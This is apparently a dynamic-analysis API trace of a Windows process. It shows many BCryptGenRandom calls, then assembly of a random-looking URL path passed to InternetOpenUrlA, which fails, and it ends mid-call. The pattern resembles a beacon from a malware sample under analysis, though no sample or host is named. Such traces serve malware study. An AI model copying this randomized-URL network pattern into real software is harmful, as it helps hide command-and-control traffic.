[0245.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.621] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.621] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.621] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02790, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a02790) returned 0x0 [0245.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a027a3, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a027a3) returned 0x0 [0245.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.634] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.636] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a027c1, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a027c1) returned 0x0 [0245.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.641] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.643] GetProcessHeap () returned 0x440000 [0245.643] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0245.643] lstrcpyA (in: lpString1=0x4741c0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0245.643] lstrcatA (in: lpString1="\x04", lpString2="/hIwyudxzBlP60rohfoNIxhqhy9/kou0199u89mvC6jb3StIGBJJ7ratxppqttd/Ah87Yuwjf2zD1d67nq/sxgf2G82zdmvri9ieum8a5Vz3qoCl/od1oX4fvP17b9mtgIjb6dzrJa67/" | out: lpString1="\x04/hIwyudxzBlP60rohfoNIxhqhy9/kou0199u89mvC6jb3StIGBJJ7ratxppqttd/Ah87Yuwjf2zD1d67nq/sxgf2G82zdmvri9ieum8a5Vz3qoCl/od1oX4fvP17b9mtgIjb6dzrJa67/") returned="\x04/hIwyudxzBlP60rohfoNIxhqhy9/kou0199u89mvC6jb3StIGBJJ7ratxppqttd/Ah87Yuwjf2zD1d67nq/sxgf2G82zdmvri9ieum8a5Vz3qoCl/od1oX4fvP17b9mtgIjb6dzrJa67/" [0245.643] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0245.643] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/hIwyudxzBlP60rohfoNIxhqhy9/kou0199u89mvC6jb3StIGBJJ7ratxppqttd/Ah87Yuwjf2zD1d67nq/sxgf2G82zdmvri9ieum8a5Vz3qoCl/od1oX4fvP17b9mtgIjb6dzrJa67/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0245.644] GetProcessHeap () returned 0x440000 [0245.644] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0245.644] GetProcessHeap () returned 0x440000 [0245.644] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02750 | out: hHeap=0x440000) returned 1 [0245.644] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0245.644] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0245.644] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, 